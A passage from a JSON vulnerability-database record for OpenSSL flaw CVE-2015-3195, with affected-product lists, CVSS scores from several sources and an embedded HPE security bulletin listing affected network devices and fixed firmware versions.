                "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "139114"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134783"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2015-3195",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2015-3195",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-07950",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-81156",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2015-3195",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "Low",
            "baseScore": 5.3,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-3195",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-3195",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-07950",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201512-075",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-81156",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-3195",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application. OpenSSL is an open source SSL implementation used to implement high-strength encryption of network communications. \n\nOpenSSL\u0027s handling of X509_ATTRIBUTE has a security vulnerability. A remote attacker can use the vulnerability to send a message containing a special X509_ATTRIBUTE structure to trigger a memory leak. The attacker can obtain sensitive information. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. The vulnerability is due to the error caused by the program not correctly handling the malformed X509_ATTRIBUTE data. The following versions are affected: OpenSSL prior to 0.9.8zh, 1.0.0 prior to 1.0.0t, 1.0.1 prior to 1.0.1q, 1.0.2 prior to 1.0.2e. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05398322\nVersion: 1\n\nHPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-02-21\nLast Updated: 2017-02-21\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nNetwork products including Comware 5, Comware 7, IMC, and VCX. The\nvulnerabilities could be remotely exploited resulting in Denial of Service\n(DoS) or disclosure of sensitive information. \n\nReferences:\n\n  - CVE-2015-1794 - Remote Denial of Service (DoS)\n  - CVE-2015-3193 - Remote disclosure of sensitive information\n  - CVE-2015-3194 - Remote Denial of Service (DoS)\n  - CVE-2015-3195 - Remote disclosure of sensitive information\n  - CVE-2015-3196 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n  - Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n  - HPE Intelligent Management Center (iMC) All versions - Please refer to\nthe RESOLUTION below for a list of updated products. \n  - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2015-1794\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-3193\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n    CVE-2015-3194\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-3195\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-3196\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates to resolve the vulnerabilities in\nthe Comware, IMC and VCX products running OpenSSL. \n\n\n**COMWARE 5 Products**\n\n  + **A6600 (Comware 5) - Version: R3303P28**\n    * HP Network Products\n      - JC165A HP 6600 RPE-X1 Router Module\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n      - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n      - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n  + **HSR6602 (Comware 5) - Version: R3303P28**\n    * HP Network Products\n      - JC176A HP 6602 Router Chassis\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n      - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n      - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n  + **HSR6800 (Comware 5) - Version: R3303P28**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n  + **MSR20 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD432A HP A-MSR20-21 Router\n      - JD662A HP MSR20-20 Router\n      - JD663A HP A-MSR20-21 Router\n      - JD663B HP MSR20-21 Router\n      - JD664A HP MSR20-40 Router\n      - JF228A HP MSR20-40 Router\n      - JF283A HP MSR20-20 Router\n  + **MSR20-1X  (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD431A HP MSR20-10 Router\n      - JD667A HP MSR20-15 IW Multi-Service Router\n      - JD668A HP MSR20-13 Multi-Service Router\n      - JD669A HP MSR20-13 W Multi-Service Router\n      - JD670A HP MSR20-15 A Multi-Service Router\n      - JD671A HP MSR20-15 AW Multi-Service Router\n      - JD672A HP MSR20-15 I Multi-Service Router\n      - JD673A HP MSR20-11 Multi-Service Router\n      - JD674A HP MSR20-12 Multi-Service Router\n      - JD675A HP MSR20-12 W Multi-Service Router\n      - JD676A HP MSR20-12 T1 Multi-Service Router\n      - JF236A HP MSR20-15-I Router\n      - JF237A HP MSR20-15-A Router\n      - JF238A HP MSR20-15-I-W Router\n      - JF239A HP MSR20-11 Router\n      - JF240A HP MSR20-13 Router\n      - JF241A HP MSR20-12 Router\n      - JF806A HP MSR20-12-T Router\n      - JF807A HP MSR20-12-W Router\n      - JF808A HP MSR20-13-W Router\n      - JF809A HP MSR20-15-A-W Router\n      - JF817A HP MSR20-15 Router\n      - JG209A HP MSR20-12-T-W Router (NA)\n      - JG210A HP MSR20-13-W Router (NA)\n  + **MSR 30 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD654A HP MSR30-60 POE Multi-Service Router\n      - JD657A HP MSR30-40 Multi-Service Router\n      - JD658A HP MSR30-60 Multi-Service Router\n      - JD660A HP MSR30-20 POE Multi-Service Router\n      - JD661A HP MSR30-40 POE Multi-Service Router\n      - JD666A HP MSR30-20 Multi-Service Router\n      - JF229A HP MSR30-40 Router\n      - JF230A HP MSR30-60 Router\n      - JF232A HP RTMSR3040-AC-OVSAS-H3\n      - JF235A HP MSR30-20 DC Router\n      - JF284A HP MSR30-20 Router\n      - JF287A HP MSR30-40 DC Router\n      - JF801A HP MSR30-60 DC Router\n      - JF802A HP MSR30-20 PoE Router\n      - JF803A HP MSR30-40 PoE Router\n      - JF804A HP MSR30-60 PoE Router\n      - JG728A HP MSR30-20 TAA-compliant DC Router\n      - JG729A HP MSR30-20 TAA-compliant Router\n  + **MSR 30-16 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD659A HP MSR30-16 POE Multi-Service Router\n      - JD665A HP MSR30-16 Multi-Service Router\n      - JF233A HP MSR30-16 Router\n      - JF234A HP MSR30-16 PoE Router\n  + **MSR 30-1X (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JF800A HP MSR30-11 Router\n      - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\n      - JG182A HP MSR30-11E Router\n      - JG183A HP MSR30-11F Router\n      - JG184A HP MSR30-10 DC Router\n  + **MSR 50 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD433A HP MSR50-40 Router\n      - JD653A HP MSR50 Processor Module\n      - JD655A HP MSR50-40 Multi-Service Router\n      - JD656A HP MSR50-60 Multi-Service Router\n      - JF231A HP MSR50-60 Router\n      - JF285A HP MSR50-40 DC Router\n      - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n  + **MSR 50-G2 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD429A HP MSR50 G2 Processor Module\n      - JD429B HP MSR50 G2 Processor Module\n  + **MSR 9XX (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JF812A HP MSR900 Router\n      - JF813A HP MSR920 Router\n      - JF814A HP MSR900-W Router\n      - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr\n      - JG207A HP MSR900-W Router (NA)\n      - JG208A HP MSR920-W Router (NA)\n  + **MSR 93X (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JG511A HP MSR930 Router\n      - JG511B HP MSR930 Router\n      - JG512A HP MSR930 Wireless Router\n      - JG513A HP MSR930 3G Router\n      - JG513B HP MSR930 3G Router\n      - JG514A HP MSR931 Router\n      - JG514B HP MSR931 Router\n      - JG515A HP MSR931 3G Router\n      - JG516A HP MSR933 Router\n      - JG517A HP MSR933 3G Router\n      - JG518A HP MSR935 Router\n      - JG518B HP MSR935 Router\n      - JG519A HP MSR935 Wireless Router\n      - JG520A HP MSR935 3G Router\n      - JG531A HP MSR931 Dual 3G Router\n      - JG531B HP MSR931 Dual 3G Router\n      - JG596A HP MSR930 4G LTE/3G CDMA Router\n      - JG597A HP MSR936 Wireless Router\n      - JG665A HP MSR930 4G LTE/3G WCDMA Global Router\n      - JG704A HP MSR930 4G LTE/3G WCDMA  ATT Router\n      - JH009A HP MSR931 Serial (TI) Router\n      - JH010A HP MSR933 G.SHDSL (TI) Router\n      - JH011A HP MSR935 ADSL2+ (TI) Router\n      - JH012A HP MSR930 Wireless 802.11n (NA) Router\n      - JH012B HP MSR930 Wireless 802.11n (NA) Router\n      - JH013A HP MSR935 Wireless 802.11n (NA) Router\n  + **MSR1000 (Comware 5) - Version: See Mitigation**\n    * HP Network Products\n      - JG732A HP MSR1003-8 AC Router\n  + **12500 (Comware 5) - Version: R1829P02**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JC808A HP 12500 TAA Main Processing Unit\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n  + **9500E (Comware 5) - Version: R1829P02**\n    * HP Network Products\n      - JC124A HP A9508 Switch Chassis\n      - JC124B HP 9505 Switch Chassis\n      - JC125A HP A9512 Switch Chassis\n      - JC125B HP 9512 Switch Chassis\n      - JC474A HP A9508-V Switch Chassis\n      - JC474B HP 9508-V Switch Chassis\n  + **10500 (Comware 5) - Version: R1210P02**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC614A HP 10500 Main Processing Unit\n      - JC748A HP 10512 Switch Chassis\n      - JG375A HP 10500 TAA-compliant Main Processing Unit\n      - JG820A HP 10504 TAA-compliant Switch Chassis\n      - JG821A HP 10508 TAA-compliant Switch Chassis\n      - JG822A HP 10508-V TAA-compliant Switch Chassis\n      - JG823A HP 10512 TAA-compliant Switch Chassis\n  + **7500 (Comware 5) - Version: R6710P02**\n    * HP Network Products\n      - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port\nGig-T/4-port GbE Combo\n      - JC697A HP 7502 TAA-compliant Main Processing Unit\n      - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8\nGbE Combo Ports\n      - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP\nPorts\n      - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit\n      - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit\n      - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports\n      - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports\n      - JD194A HP 7500 384Gbps Fabric Module\n      - JD194B HP 7500 384Gbps Fabric Module\n      - JD195A HP 7500 384Gbps Advanced Fabric Module\n      - JD196A HP 7502 Fabric Module\n      - JD220A HP 7500 768Gbps Fabric Module\n      - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports\n      - JD238A HP 7510 Switch Chassis\n      - JD238B HP 7510 Switch Chassis\n      - JD239A HP 7506 Switch Chassis\n      - JD239B HP 7506 Switch Chassis\n      - JD240A HP 7503 Switch Chassis\n      - JD240B HP 7503 Switch Chassis\n      - JD241A HP 7506-V Switch Chassis\n      - JD241B HP 7506-V Switch Chassis\n      - JD242A HP 7502 Switch Chassis\n      - JD242B HP 7502 Switch Chassis\n      - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot\n      - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot\n      - JE164A HP E7902 Switch Chassis\n      - JE165A HP E7903 Switch Chassis\n      - JE166A HP E7903 1 Fabric Slot Switch Chassis\n      - JE167A HP E7906 Switch Chassis\n      - JE168A HP E7906 Vertical Switch Chassis\n      - JE169A HP E7910 Switch Chassis\n  + **6125G/XG Blade Switch - Version: R2112P05**\n    * HP Network Products\n      - 737220-B21 HP 6125G Blade Switch with TAA\n      - 737226-B21 HP 6125G/XG Blade Switch with TAA\n      - 658250-B21 HP 6125G/XG Blade Switch Opt Kit\n      - 658247-B21 HP 6125G Blade Switch Opt Kit\n  + **5830 (Comware 5) - Version: R1118P13**\n    * HP Network Products\n      - JC691A HP 5830AF-48G Switch with 1 Interface Slot\n      - JC694A HP 5830AF-96G Switch\n      - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot\n      - JG374A HP 5830AF-96G TAA-compliant Switch\n  + **5800 (Comware 5) - Version: R1810P03**\n    * HP Network Products\n      - JC099A HP 5800-24G-PoE Switch\n      - JC099B HP 5800-24G-PoE+ Switch\n      - JC100A HP 5800-24G Switch\n      - JC100B HP 5800-24G Switch\n      - JC101A HP 5800-48G Switch with 2 Slots\n      - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n      - JC103A HP 5800-24G-SFP Switch\n      - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n      - JC104A HP 5800-48G-PoE Switch\n      - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n      - JC105A HP 5800-48G Switch\n      - JC105B HP 5800-48G Switch with 1 Interface Slot\n      - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n      - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n      - JG255A HP 5800-24G TAA-compliant Switch\n      - JG255B HP 5800-24G TAA-compliant Switch\n      - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n      - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n      - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n      - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n      - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n      - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n      - JG225A HP 5800AF-48G Switch\n      - JG225B HP 5800AF-48G Switch\n      - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots\n      - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n      - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n      - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n      - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n      - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n      - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n      - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n      - JG219A HP 5820AF-24XG Switch\n      - JG219B HP 5820AF-24XG Switch\n      - JC102A HP 5820-24XG-SFP+ Switch\n      - JC102B HP 5820-24XG-SFP+ Switch\n  + **5500 HI (Comware 5) - Version: R5501P21**\n    * HP Network Products\n      - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots\n      - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots\n      - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots\n      - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots\n      - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots\n      - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n      - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n      - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n  + **5500 EI (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JD373A HP 5500-24G DC EI Switch\n      - JD374A HP 5500-24G-SFP EI Switch\n      - JD375A HP 5500-48G EI Switch\n      - JD376A HP 5500-48G-PoE EI Switch\n      - JD377A HP 5500-24G EI Switch\n      - JD378A HP 5500-24G-PoE EI Switch\n      - JD379A HP 5500-24G-SFP DC EI Switch\n      - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots\n      - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots\n      - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface\n      - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots\n      - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots\n      - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n      - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n  + **4800G (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JD007A HP 4800-24G Switch\n      - JD008A HP 4800-24G-PoE Switch\n      - JD009A HP 4800-24G-SFP Switch\n      - JD010A HP 4800-48G Switch\n      - JD011A HP 4800-48G-PoE Switch\n  + **5500SI (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JD369A HP 5500-24G SI Switch\n      - JD370A HP 5500-48G SI Switch\n      - JD371A HP 5500-24G-PoE SI Switch\n      - JD372A HP 5500-48G-PoE SI Switch\n      - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots\n      - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots\n  + **4500G (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JF428A HP 4510-48G Switch\n      - JF847A HP 4510-24G Switch\n  + **5120 EI (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JE066A HP 5120-24G EI Switch\n      - JE067A HP 5120-48G EI Switch\n      - JE068A HP 5120-24G EI Switch with 2 Interface Slots\n      - JE069A HP 5120-48G EI Switch with 2 Interface Slots\n      - JE070A HP 5120-24G-PoE EI 2-slot Switch\n      - JE071A HP 5120-48G-PoE EI 2-slot Switch\n      - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots\n      - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots\n      - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots\n      - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots\n      - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots\n      - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots\n  + **4210G (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JF844A HP 4210-24G Switch\n      - JF845A HP 4210-48G Switch\n      - JF846A HP 4210-24G-PoE Switch\n  + **5120 SI (Comware 5) - Version: R1517**\n    * HP Network Products\n      - JE072A HP 5120-48G SI Switch\n      - JE072B HPE 5120 48G SI Switch\n      - JE073A HP 5120-16G SI Switch\n      - JE073B HPE 5120 16G SI Switch\n      - JE074A HP 5120-24G SI Switch\n      - JE074B HPE 5120 24G SI Switch\n      - JG091A HP 5120-24G-PoE+ (370W) SI Switch\n      - JG091B HPE 5120 24G PoE+ (370W) SI Switch\n      - JG092A HP 5120-24G-PoE+ (170W) SI Switch\n      - JG309B HPE 5120 8G PoE+ (180W) SI Switch\n      - JG310B HPE 5120 8G PoE+ (65W) SI Switch\n  + **3610 (Comware 5) - Version: R5319P15**\n    * HP Network Products\n      - JD335A HP 3610-48 Switch\n      - JD336A HP 3610-24-4G-SFP Switch\n      - JD337A HP 3610-24-2G-2G-SFP Switch\n      - JD338A HP 3610-24-SFP Switch\n  + **3600V2 (Comware 5) - Version: R2111P01**\n    * HP Network Products\n      - JG299A HP 3600-24 v2 EI Switch\n      - JG299B HP 3600-24 v2 EI Switch\n      - JG300A HP 3600-48 v2 EI Switch\n      - JG300B HP 3600-48 v2 EI Switch\n      - JG301A HP 3600-24-PoE+ v2 EI Switch\n      - JG301B HP 3600-24-PoE+ v2 EI Switch\n      - JG301C HP 3600-24-PoE+ v2 EI Switch\n      - JG302A HP 3600-48-PoE+ v2 EI Switch\n      - JG302B HP 3600-48-PoE+ v2 EI Switch\n      - JG302C HP 3600-48-PoE+ v2 EI Switch\n      - JG303A HP 3600-24-SFP v2 EI Switch\n      - JG303B HP 3600-24-SFP v2 EI Switch\n      - JG304A HP 